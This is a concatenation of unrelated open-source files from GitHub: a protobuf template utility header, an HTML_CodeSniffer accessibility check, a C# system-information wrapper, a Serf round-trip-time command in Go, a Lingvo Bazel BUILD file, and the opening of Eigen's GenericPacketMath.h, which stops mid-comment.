// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// ----
// Author: [email protected] (Laramie Leavitt)
//
// Template metaprogramming utility functions.
//
// This code is compiled directly on many platforms, including client
// platforms like Windows, Mac, and embedded systems. Before making
// any changes here, make sure that you're not breaking any platforms.
//
//
// The names chosen here reflect those used in tr1 and the boost::mpl
// library, there are similar operations used in the Loki library as
// well. I prefer the boost names for 2 reasons:
// 1. I think that portions of the Boost libraries are more likely to
// be included in the c++ standard.
// 2. It is not impossible that some of the boost libraries will be
// included in our own build in the future.
// Both of these outcomes means that we may be able to directly replace
// some of these with boost equivalents.
//
#ifndef GOOGLE_PROTOBUF_TEMPLATE_UTIL_H_
#define GOOGLE_PROTOBUF_TEMPLATE_UTIL_H_
namespace google {
namespace protobuf {
namespace internal {
// Types small_ and big_ are guaranteed such that sizeof(small_) <
// sizeof(big_)
typedef char small_;
struct big_ {
char dummy[2];
};
// Identity metafunction.
template <class T>
struct identity_ {
typedef T type;
};
// integral_constant, defined in tr1, is a wrapper for an integer
// value. We don't really need this generality; we could get away
// with hardcoding the integer type to bool. We use the fully
// general integer_constant for compatibility with tr1.
template<class T, T v>
struct integral_constant {
static const T value = v;
typedef T value_type;
typedef integral_constant<T, v> type;
};
template <class T, T v> const T integral_constant<T, v>::value;
// Abbreviations: true_type and false_type are structs that represent boolean
// true and false values. Also define the boost::mpl versions of those names,
// true_ and false_.
typedef integral_constant<bool, true> true_type;
typedef integral_constant<bool, false> false_type;
typedef true_type true_;
typedef false_type false_;
// if_ is a templatized conditional statement.
// if_<cond, A, B> is a compile time evaluation of cond.
// if_<>::type contains A if cond is true, B otherwise.
template<bool cond, typename A, typename B>
struct if_{
typedef A type;
};
template<typename A, typename B>
struct if_<false, A, B> {
typedef B type;
};
// type_equals_ is a template type comparator, similar to Loki IsSameType.
// type_equals_<A, B>::value is true iff "A" is the same type as "B".
//
// New code should prefer base::is_same, defined in base/type_traits.h.
// It is functionally identical, but is_same is the standard spelling.
template<typename A, typename B>
struct type_equals_ : public false_ {
};
template<typename A>
struct type_equals_<A, A> : public true_ {
};
// and_ is a template && operator.
// and_<A, B>::value evaluates "A::value && B::value".
template<typename A, typename B>
struct and_ : public integral_constant<bool, (A::value && B::value)> {
};
// or_ is a template || operator.
// or_<A, B>::value evaluates "A::value || B::value".
template<typename A, typename B>
struct or_ : public integral_constant<bool, (A::value || B::value)> {
};
} // namespace internal
} // namespace protobuf
} // namespace google
#endif // GOOGLE_PROTOBUF_TEMPLATE_UTIL_H_
| {
"pile_set_name": "Github"
} |
/**
* +--------------------------------------------------------------------+
* | This HTML_CodeSniffer file is Copyright (c) |
* | Squiz Australia Pty Ltd ABN 53 131 581 247 |
* +--------------------------------------------------------------------+
* | IMPORTANT: Your use of this Software is subject to the terms of |
* | the Licence provided in the file licence.txt. If you cannot find |
* | this file please contact Squiz (www.squiz.com.au) so we may |
* | provide you a copy. |
* +--------------------------------------------------------------------+
*
*/
_global.HTMLCS_Section508_Sniffs_I = {
/**
* Determines the elements to register for processing.
*
* Each element of the returned array can either be an element name, or "_top"
* which is the top element of the tested code.
*
* @returns {Array} The list of elements.
*/
register: function()
{
return [
'frame',
'iframe',
'object'
];
},
/**
* Process the registered element.
*
* @param {DOMNode} element The element registered.
* @param {DOMNode} top The top element of the tested code.
*/
process: function(element, top)
{
var nodeName = element.nodeName.toLowerCase();
var hasTitle = element.hasAttribute('title');
var titleEmpty = true;
if (hasTitle === true) {
titleEmpty = HTMLCS.util.isStringEmpty(element.getAttribute('title'));
}
if (titleEmpty === true) {
HTMLCS.addMessage(HTMLCS.ERROR, top, 'This ' + nodeName + ' element is missing title text. Frames should be titled with text that facilitates frame identification and navigation.', 'Frames');
}
}
};
| {
"pile_set_name": "Github"
} |
using System;
using System.ComponentModel;
using WinForms = System.Windows.Forms;
namespace StarryEyes.Nightmare.Windows
{
public static class SystemInformation
{
public static string ComputerName
{
get { return WinForms.SystemInformation.ComputerName; }
}
public static string UserName
{
get { return WinForms.SystemInformation.UserName; }
}
public static bool MouseButtonsSwapped
{
get { return WinForms.SystemInformation.MouseButtonsSwapped; }
}
public static int MouseWheelScrollDelta
{
get { return WinForms.SystemInformation.MouseWheelScrollDelta; }
}
public static uint DesktopHeapSize
{
get
{
var hDesktop = NativeMethods.OpenInputDesktop(0, false, NativeMethods.GENERIC_READ);
if (hDesktop == IntPtr.Zero)
{
throw new Win32Exception();
}
try
{
var buffer = new byte[4]; // unsigned long(32bit)
uint n;
if (!NativeMethods.GetUserObjectInformation(hDesktop, NativeMethods.UOI_HEAPSIZE, buffer, sizeof(byte) * 4, out n))
{
throw new Win32Exception();
}
return BitConverter.ToUInt32(buffer, 0);
}
finally
{
NativeMethods.CloseDesktop(hDesktop);
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
package command
import (
"flag"
"fmt"
"strings"
"github.com/mitchellh/cli"
)
// RTTCommand is a Command implementation that allows users to query the
// estimated round trip time between nodes using network coordinates.
type RTTCommand struct {
Ui cli.Ui
}
func (c *RTTCommand) Help() string {
helpText := `
Usage: serf rtt [options] node1 [node2]
Estimates the round trip time between two nodes using Serf's network
coordinate model of the cluster.
At least one node name is required. If the second node name isn't given, it
is set to the agent's node name. Note that these are node names as known to
Serf as "serf members" would show, not IP addresses.
Options:
-rpc-addr=127.0.0.1:7373 RPC address of the Serf agent.
-rpc-auth="" RPC auth token of the Serf agent.
`
return strings.TrimSpace(helpText)
}
func (c *RTTCommand) Run(args []string) int {
cmdFlags := flag.NewFlagSet("rtt", flag.ContinueOnError)
cmdFlags.Usage = func() { c.Ui.Output(c.Help()) }
rpcAddr := RPCAddrFlag(cmdFlags)
rpcAuth := RPCAuthFlag(cmdFlags)
if err := cmdFlags.Parse(args); err != nil {
return 1
}
// Create the RPC client.
client, err := RPCClient(*rpcAddr, *rpcAuth)
if err != nil {
c.Ui.Error(fmt.Sprintf("Error connecting to Serf agent: %s", err))
return 1
}
defer client.Close()
// They must provide at least one node.
nodes := cmdFlags.Args()
if len(nodes) == 1 {
stats, err := client.Stats()
if err != nil {
c.Ui.Error(fmt.Sprintf("Error querying agent: %s", err))
return 1
}
nodes = append(nodes, stats["agent"]["name"])
} else if len(nodes) != 2 {
c.Ui.Error("One or two node names must be specified")
c.Ui.Error("")
c.Ui.Error(c.Help())
return 1
}
// Get the coordinates.
coord1, err := client.GetCoordinate(nodes[0])
if err != nil {
c.Ui.Error(fmt.Sprintf("Error getting coordinates: %s", err))
return 1
}
if coord1 == nil {
c.Ui.Error(fmt.Sprintf("Could not find a coordinate for node %q", nodes[0]))
return 1
}
coord2, err := client.GetCoordinate(nodes[1])
if err != nil {
c.Ui.Error(fmt.Sprintf("Error getting coordinates: %s", err))
return 1
}
if coord2 == nil {
c.Ui.Error(fmt.Sprintf("Could not find a coordinate for node %q", nodes[1]))
return 1
}
// Report the round trip time.
dist := fmt.Sprintf("%.3f ms", coord1.DistanceTo(coord2).Seconds()*1000.0)
c.Ui.Output(fmt.Sprintf("Estimated %s <-> %s rtt: %s", nodes[0], nodes[1], dist))
return 0
}
func (c *RTTCommand) Synopsis() string {
return "Estimates network round trip time between nodes"
}
| {
"pile_set_name": "Github"
} |
load(
"//lingvo:lingvo.bzl",
"lingvo_py_binary",
)
package(
default_visibility = ["//visibility:public"],
)
licenses(["notice"])
exports_files(["LICENSE"])
config_setting(
name = "cuda",
values = {"define": "using_cuda=true"},
)
py_library(
name = "base_runner",
srcs = ["base_runner.py"],
srcs_version = "PY3",
deps = [
":base_trial",
":compat",
"//lingvo/core:cluster_factory",
"//lingvo/core:early_stop",
"//lingvo/core:py_utils",
# Implicit tensorflow py proto dependency.
],
)
py_library(
name = "base_trial",
srcs = ["base_trial.py"],
srcs_version = "PY3",
deps = [
"//lingvo/core:hyperparams",
],
)
py_library(
name = "compat",
srcs = ["compat.py"],
srcs_version = "PY3",
deps = [
# Implicit absl.flags dependency.
# Implicit absl.logging dependency.
# Implicit tensorflow dependency.
],
)
py_test(
name = "compat_test",
srcs = ["compat_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
],
)
py_library(
name = "model_imports_no_params",
srcs = ["model_imports.py"],
srcs_version = "PY3",
)
# Depend on this for access to the model registry with params for all tasks as
# transitive deps. Only py_binary should depend on this target.
py_library(
name = "model_imports",
srcs_version = "PY3",
deps = [
":model_imports_no_params",
"//lingvo/tasks:all_params",
],
)
py_test(
name = "model_import_test",
srcs = ["model_import_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
":model_imports_no_params",
],
)
py_library(
name = "models_test_helper",
testonly = 1,
srcs = ["models_test_helper.py"],
srcs_version = "PY3",
deps = [
":compat",
"//lingvo/core:base_input_generator",
"//lingvo/core:base_model",
"//lingvo/core:bn_layers",
"//lingvo/core:py_utils",
"//lingvo/core:test_utils",
],
)
py_test(
name = "models_test",
srcs = ["models_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
":model_imports",
":model_registry",
":model_registry_test_lib",
":models_test_helper",
"//lingvo/core:base_model",
],
)
py_library(
name = "model_registry",
srcs = ["model_registry.py"],
srcs_version = "PY3",
deps = [
":compat",
":model_imports_no_params",
"//lingvo/core:base_model_params",
],
)
py_test(
name = "model_registry_test",
srcs = ["model_registry_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [":model_registry_test_lib"],
)
py_library(
name = "model_registry_test_lib",
testonly = 1,
srcs = ["model_registry_test.py"],
srcs_version = "PY3",
deps = [
":compat",
":model_registry",
"//lingvo/core:base_input_generator",
"//lingvo/core:base_model",
"//lingvo/core:base_model_params",
"//lingvo/core:test_utils",
],
)
py_library(
name = "datasets_lib",
srcs = ["datasets.py"],
srcs_version = "PY3",
)
py_test(
name = "datasets_test",
srcs = ["datasets_test.py"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":compat",
":datasets_lib",
"//lingvo/core:test_utils",
],
)
py_library(
name = "trainer_lib",
srcs = ["trainer.py"],
srcs_version = "PY3",
deps = [
":base_trial",
":compat",
":datasets_lib",
":executor_lib",
":model_imports_no_params",
":model_registry",
# Implicit network file system dependency.
"//lingvo:base_runner",
# Implicit IPython dependency.
"//lingvo/core:base_layer",
"//lingvo/core:base_model",
"//lingvo/core:base_model_params",
"//lingvo/core:checkpointer_lib",
"//lingvo/core:cluster_factory",
"//lingvo/core:inference_graph_exporter",
"//lingvo/core:metrics",
"//lingvo/core:py_utils",
"//lingvo/core:summary_utils",
# Implicit numpy dependency.
# Implicit tensorflow grpc dependency.
],
)
lingvo_py_binary(
name = "trainer",
srcs = [":trainer_lib"],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":model_imports",
":trainer_lib",
],
)
py_test(
name = "trainer_test",
size = "large",
timeout = "long",
srcs = ["trainer_test.py"],
python_version = "PY3",
shard_count = 12,
srcs_version = "PY3",
tags = [
"noasan",
"nomsan",
"notsan",
"optonly",
],
deps = [
":base_trial",
":compat",
":model_registry",
":trainer_lib",
# Implicit absl.testing.flagsaver dependency.
"//lingvo/core:base_input_generator",
"//lingvo/core:base_model",
"//lingvo/core:base_model_params",
"//lingvo/core:hyperparams",
"//lingvo/core:inference_graph_py_pb2",
"//lingvo/core:test_utils",
"//lingvo/core:trainer_test_utils",
"//lingvo/tasks/image:input_generator",
"//lingvo/tasks/image/params:mnist", # build_cleaner: keep
"//lingvo/tasks/punctuator/params:codelab", # build_cleaner: keep
# Implicit numpy dependency.
],
)
py_library(
name = "trainer_test_lib",
testonly = 1,
srcs = ["trainer_test.py"],
srcs_version = "PY3",
tags = [
"noasan",
"nomsan",
"notsan",
"optonly",
],
deps = [
":base_trial",
":compat",
":model_registry",
":trainer_lib",
"//lingvo/core:base_input_generator",
"//lingvo/core:base_layer",
"//lingvo/core:base_model",
"//lingvo/core:py_utils",
"//lingvo/core:test_utils",
"//lingvo/core:trainer_test_utils",
"//lingvo/tasks/image:input_generator",
"//lingvo/tasks/image/params:mnist",
"//lingvo/tasks/punctuator/params:codelab",
# Implicit numpy dependency.
],
)
lingvo_py_binary(
name = "ipython_kernel",
srcs = ["ipython_kernel.py"],
data = [
"//lingvo/tasks/punctuator/tools:download_brown_corpus",
],
python_version = "PY3",
srcs_version = "PY3",
deps = [
":model_imports", # build_cleaner: keep
":trainer_lib", # build_cleaner: keep
# Implicit absl.app dependency.
"//lingvo/core:predictor_lib", # build_cleaner: keep
"//lingvo/core/ops:hyps_py_pb2", # build_cleaner: keep
],
)
genrule(
name = "tf_dot_protos",
srcs = [],
outs = ["tf_protos.tar"],
cmd =
"$(location //lingvo/tools:" +
"generate_tf_dot_protos) $(location " +
"//lingvo/tools:generate_proto_def) $(@D)",
tools = [
"//lingvo/tools:generate_proto_def",
"//lingvo/tools:generate_tf_dot_protos",
],
)
py_library(
name = "executor_lib",
srcs = ["executor.py"],
srcs_version = "PY3",
deps = [
":compat",
# Implicit network file system dependency.
"//lingvo:base_runner",
"//lingvo/core:base_model",
"//lingvo/core:checkpointer_lib",
"//lingvo/core:cluster_factory",
"//lingvo/core:ml_perf_log",
"//lingvo/core:multitask_model",
"//lingvo/core:py_utils",
"//lingvo/core:task_scheduler",
# Implicit tensorflow grpc dependency.
],
)
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2008 Gael Guennebaud <[email protected]>
// Copyright (C) 2006-2008 Benoit Jacob <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_GENERIC_PACKET_MATH_H
#define EIGEN_GENERIC_PACKET_MATH_H
namespace Eigen {
namespace internal {
/** \internal
* \file GenericPacketMath.h
*
* Default implementation for types not supported by the vectorization.
* In practice these functions are provided to make easier the writing
* of generic vectorized code.
*/
#ifndef EIGEN_DEBUG_ALIGNED_LOAD
#define EIGEN_DEBUG_ALIGNED_LOAD
#endif
#ifndef EIGEN_DEBUG_UNALIGNED_LOAD
#define EIGEN_DEBUG_UNALIGNED_LOAD
#endif
#ifndef EIGEN_DEBUG_ALIGNED_STORE
#define EIGEN_DEBUG_ALIGNED_STORE
#endif
#ifndef EIGEN_DEBUG_UNALIGNED_STORE
#define EIGEN_DEBUG_UNALIGNED_STORE
#endif
struct default_packet_traits
{
enum {
HasHalfPacket = 0,
HasAdd = 1,
HasSub = 1,
HasMul = 1,
HasNegate = 1,
HasAbs = 1,
HasArg = 0,
HasAbs2 = 1,
HasMin = 1,
HasMax = 1,
HasConj = 1,
HasSetLinear = 1,
HasBlend = 0,
HasDiv = 0,
HasSqrt = 0,
HasRsqrt = 0,
HasExp = 0,
HasLog = 0,
HasLog1p = 0,
HasLog10 = 0,
HasPow = 0,
HasSin = 0,
HasCos = 0,
HasTan = 0,
HasASin = 0,
HasACos = 0,
HasATan = 0,
HasSinh = 0,
HasCosh = 0,
HasTanh = 0,
HasLGamma = 0,
HasDiGamma = 0,
HasZeta = 0,
HasPolygamma = 0,
HasErf = 0,
HasErfc = 0,
HasIGamma = 0,
HasIGammac = 0,
HasBetaInc = 0,
HasRound = 0,
HasFloor = 0,
HasCeil = 0,
HasSign = 0
};
};
template<typename T> struct packet_traits : default_packet_traits
{
typedef T type;
typedef T half;
enum {
Vectorizable = 0,
size = 1,
AlignedOnScalar = 0,
HasHalfPacket = 0
};
enum {
HasAdd = 0,
HasSub = 0,
HasMul = 0,
HasNegate = 0,
HasAbs = 0,
HasAbs2 = 0,
HasMin = 0,
HasMax = 0,
HasConj = 0,
HasSetLinear = 0
};
};
template<typename T> struct packet_traits<const T> : packet_traits<T> { };
template <typename Src, typename Tgt> struct type_casting_traits {
enum {
VectorizedCast = 0,
SrcCoeffRatio = 1,
TgtCoeffRatio = 1
};
};
/** \internal \returns static_cast<TgtType>(a) (coeff-wise) */
template <typename SrcPacket, typename TgtPacket>
EIGEN_DEVICE_FUNC inline TgtPacket
pcast(const SrcPacket& a) {
return static_cast<TgtPacket>(a);
}
template <typename SrcPacket, typename TgtPacket>
EIGEN_DEVICE_FUNC inline TgtPacket
pcast(const SrcPacket& a, const SrcPacket& /*b*/) {
return static_cast<TgtPacket>(a);
}
template <typename SrcPacket, typename TgtPacket>
EIGEN_DEVICE_FUNC inline TgtPacket
pcast(const SrcPacket& a, const SrcPacket& /*b*/, const SrcPacket& /*c*/, const SrcPacket& /*d*/) {
return static_cast<TgtPacket>(a);
}
/** \internal \returns a + b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
padd(const Packet& a,
const Packet& b) { return a+b; }
/** \internal \returns a - b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
psub(const Packet& a,
const Packet& b) { return a-b; }
/** \internal \returns -a (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pnegate(const Packet& a) { return -a; }
/** \internal \returns conj(a) (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pconj(const Packet& a) { return numext::conj(a); }
/** \internal \returns a * b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmul(const Packet& a,
const Packet& b) { return a*b; }
/** \internal \returns a / b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pdiv(const Packet& a,
const Packet& b) { return a/b; }
/** \internal \returns the min of \a a and \a b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmin(const Packet& a,
const Packet& b) { return numext::mini(a, b); }
/** \internal \returns the max of \a a and \a b (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmax(const Packet& a,
const Packet& b) { return numext::maxi(a, b); }
/** \internal \returns the absolute value of \a a */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pabs(const Packet& a) { using std::abs; return abs(a); }
/** \internal \returns the phase angle of \a a */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
parg(const Packet& a) { using numext::arg; return arg(a); }
/** \internal \returns the bitwise and of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pand(const Packet& a, const Packet& b) { return a & b; }
/** \internal \returns the bitwise or of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
por(const Packet& a, const Packet& b) { return a | b; }
/** \internal \returns the bitwise xor of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pxor(const Packet& a, const Packet& b) { return a ^ b; }
/** \internal \returns the bitwise andnot of \a a and \a b */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pandnot(const Packet& a, const Packet& b) { return a & (!b); }
/** \internal \returns a packet version of \a *from, from must be 16 bytes aligned */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pload(const typename unpacket_traits<Packet>::type* from) { return *from; }
/** \internal \returns a packet version of \a *from, (un-aligned load) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
ploadu(const typename unpacket_traits<Packet>::type* from) { return *from; }
/** \internal \returns a packet with constant coefficients \a a, e.g.: (a,a,a,a) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pset1(const typename unpacket_traits<Packet>::type& a) { return a; }
/** \internal \returns a packet with constant coefficients \a a[0], e.g.: (a[0],a[0],a[0],a[0]) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pload1(const typename unpacket_traits<Packet>::type *a) { return pset1<Packet>(*a); }
/** \internal \returns a packet with elements of \a *from duplicated.
* For instance, for a packet of 8 elements, 4 scalars will be read from \a *from and
* duplicated to form: {from[0],from[0],from[1],from[1],from[2],from[2],from[3],from[3]}
* Currently, this function is only used for scalar * complex products.
*/
template<typename Packet> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Packet
ploaddup(const typename unpacket_traits<Packet>::type* from) { return *from; }
/** \internal \returns a packet with elements of \a *from quadrupled.
* For instance, for a packet of 8 elements, 2 scalars will be read from \a *from and
* replicated to form: {from[0],from[0],from[0],from[0],from[1],from[1],from[1],from[1]}
* Currently, this function is only used in matrix products.
* For packet-size smaller or equal to 4, this function is equivalent to pload1
*/
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
ploadquad(const typename unpacket_traits<Packet>::type* from)
{ return pload1<Packet>(from); }
/** \internal equivalent to
* \code
* a0 = pload1(a+0);
* a1 = pload1(a+1);
* a2 = pload1(a+2);
* a3 = pload1(a+3);
* \endcode
* \sa pset1, pload1, ploaddup, pbroadcast2
*/
template<typename Packet> EIGEN_DEVICE_FUNC
inline void pbroadcast4(const typename unpacket_traits<Packet>::type *a,
Packet& a0, Packet& a1, Packet& a2, Packet& a3)
{
a0 = pload1<Packet>(a+0);
a1 = pload1<Packet>(a+1);
a2 = pload1<Packet>(a+2);
a3 = pload1<Packet>(a+3);
}
/** \internal equivalent to
* \code
* a0 = pload1(a+0);
* a1 = pload1(a+1);
* \endcode
* \sa pset1, pload1, ploaddup, pbroadcast4
*/
template<typename Packet> EIGEN_DEVICE_FUNC
inline void pbroadcast2(const typename unpacket_traits<Packet>::type *a,
Packet& a0, Packet& a1)
{
a0 = pload1<Packet>(a+0);
a1 = pload1<Packet>(a+1);
}
/** \internal \brief Returns a packet with coefficients (a,a+1,...,a+packet_size-1). */
template<typename Packet> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Packet
plset(const typename unpacket_traits<Packet>::type& a) { return a; }
/** \internal copy the packet \a from to \a *to, \a to must be 16 bytes aligned */
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline void pstore(Scalar* to, const Packet& from)
{ (*to) = from; }
/** \internal copy the packet \a from to \a *to, (un-aligned store) */
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline void pstoreu(Scalar* to, const Packet& from)
{ (*to) = from; }
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline Packet pgather(const Scalar* from, Index /*stride*/)
{ return ploadu<Packet>(from); }
template<typename Scalar, typename Packet> EIGEN_DEVICE_FUNC inline void pscatter(Scalar* to, const Packet& from, Index /*stride*/)
{ pstore(to, from); }
/** \internal tries to do cache prefetching of \a addr */
template<typename Scalar> EIGEN_DEVICE_FUNC inline void prefetch(const Scalar* addr)
{
#ifdef __CUDA_ARCH__
#if defined(__LP64__)
// 64-bit pointer operand constraint for inlined asm
asm(" prefetch.L1 [ %1 ];" : "=l"(addr) : "l"(addr));
#else
// 32-bit pointer operand constraint for inlined asm
asm(" prefetch.L1 [ %1 ];" : "=r"(addr) : "r"(addr));
#endif
#elif (!EIGEN_COMP_MSVC) && (EIGEN_COMP_GNUC || EIGEN_COMP_CLANG || EIGEN_COMP_ICC)
__builtin_prefetch(addr);
#endif
}
/** \internal \returns the first element of a packet */
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type pfirst(const Packet& a)
{ return a; }
/** \internal \returns a packet where the element i contains the sum of the packet of \a vec[i] */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
preduxp(const Packet* vecs) { return vecs[0]; }
/** \internal \returns the sum of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux(const Packet& a)
{ return a; }
/** \internal \returns the sum of the elements of \a a by block of 4 elements.
* For a packet {a0, a1, a2, a3, a4, a5, a6, a7}, it returns a half packet {a0+a4, a1+a5, a2+a6, a3+a7}
* For packet-size smaller or equal to 4, this boils down to a noop.
*/
template<typename Packet> EIGEN_DEVICE_FUNC inline
typename conditional<(unpacket_traits<Packet>::size%8)==0,typename unpacket_traits<Packet>::half,Packet>::type
predux_downto4(const Packet& a)
{ return a; }
/** \internal \returns the product of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux_mul(const Packet& a)
{ return a; }
/** \internal \returns the min of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux_min(const Packet& a)
{ return a; }
/** \internal \returns the max of the elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline typename unpacket_traits<Packet>::type predux_max(const Packet& a)
{ return a; }
/** \internal \returns the reversed elements of \a a*/
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet preverse(const Packet& a)
{ return a; }
/** \internal \returns \a a with real and imaginary part flipped (for complex type only) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet pcplxflip(const Packet& a)
{
return Packet(a.imag(),a.real());
}
/**************************
* Special math functions
***************************/
/** \internal \returns the sine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet psin(const Packet& a) { using std::sin; return sin(a); }
/** \internal \returns the cosine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pcos(const Packet& a) { using std::cos; return cos(a); }
/** \internal \returns the tan of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet ptan(const Packet& a) { using std::tan; return tan(a); }
/** \internal \returns the arc sine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pasin(const Packet& a) { using std::asin; return asin(a); }
/** \internal \returns the arc cosine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pacos(const Packet& a) { using std::acos; return acos(a); }
/** \internal \returns the arc tangent of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet patan(const Packet& a) { using std::atan; return atan(a); }
/** \internal \returns the hyperbolic sine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet psinh(const Packet& a) { using std::sinh; return sinh(a); }
/** \internal \returns the hyperbolic cosine of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pcosh(const Packet& a) { using std::cosh; return cosh(a); }
/** \internal \returns the hyperbolic tan of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet ptanh(const Packet& a) { using std::tanh; return tanh(a); }
/** \internal \returns the exp of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pexp(const Packet& a) { using std::exp; return exp(a); }
/** \internal \returns the log of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet plog(const Packet& a) { using std::log; return log(a); }
/** \internal \returns the log1p of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet plog1p(const Packet& a) { return numext::log1p(a); }
/** \internal \returns the log10 of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet plog10(const Packet& a) { using std::log10; return log10(a); }
/** \internal \returns the square-root of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet psqrt(const Packet& a) { using std::sqrt; return sqrt(a); }
/** \internal \returns the reciprocal square-root of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet prsqrt(const Packet& a) {
return pdiv(pset1<Packet>(1), psqrt(a));
}
/** \internal \returns the rounded value of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pround(const Packet& a) { using numext::round; return round(a); }
/** \internal \returns the floor of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pfloor(const Packet& a) { using numext::floor; return floor(a); }
/** \internal \returns the ceil of \a a (coeff-wise) */
template<typename Packet> EIGEN_DECLARE_FUNCTION_ALLOWING_MULTIPLE_DEFINITIONS
Packet pceil(const Packet& a) { using numext::ceil; return ceil(a); }
/***************************************************************************
* The following functions might not have to be overwritten for vectorized types
***************************************************************************/
/** \internal copy a packet with constant coeficient \a a (e.g., [a,a,a,a]) to \a *to. \a to must be 16 bytes aligned */
// NOTE: this function must really be templated on the packet type (think about different packet types for the same scalar type)
template<typename Packet>
inline void pstore1(typename unpacket_traits<Packet>::type* to, const typename unpacket_traits<Packet>::type& a)
{
pstore(to, pset1<Packet>(a));
}
/** \internal \returns a * b + c (coeff-wise) */
template<typename Packet> EIGEN_DEVICE_FUNC inline Packet
pmadd(const Packet& a,
const Packet& b,
const Packet& c)
{ return padd(pmul(a, b),c); }
/** \internal \returns a packet version of \a *from.
* The pointer \a from must be aligned on a \a Alignment bytes boundary. */
template<typename Packet, int Alignment>
EIGEN_DEVICE_FUNC EIGEN_ALWAYS_INLINE Packet ploadt(const typename unpacket_traits<Packet>::type* from)
{
if(Alignment >= unpacket_traits<Packet>::alignment)
return pload<Packet>(from);
else
return ploadu<Packet>(from);
}
/** \internal copy the packet \a from to \a *to.
* The pointer \a from must be aligned on a \a Alignment bytes boundary. */
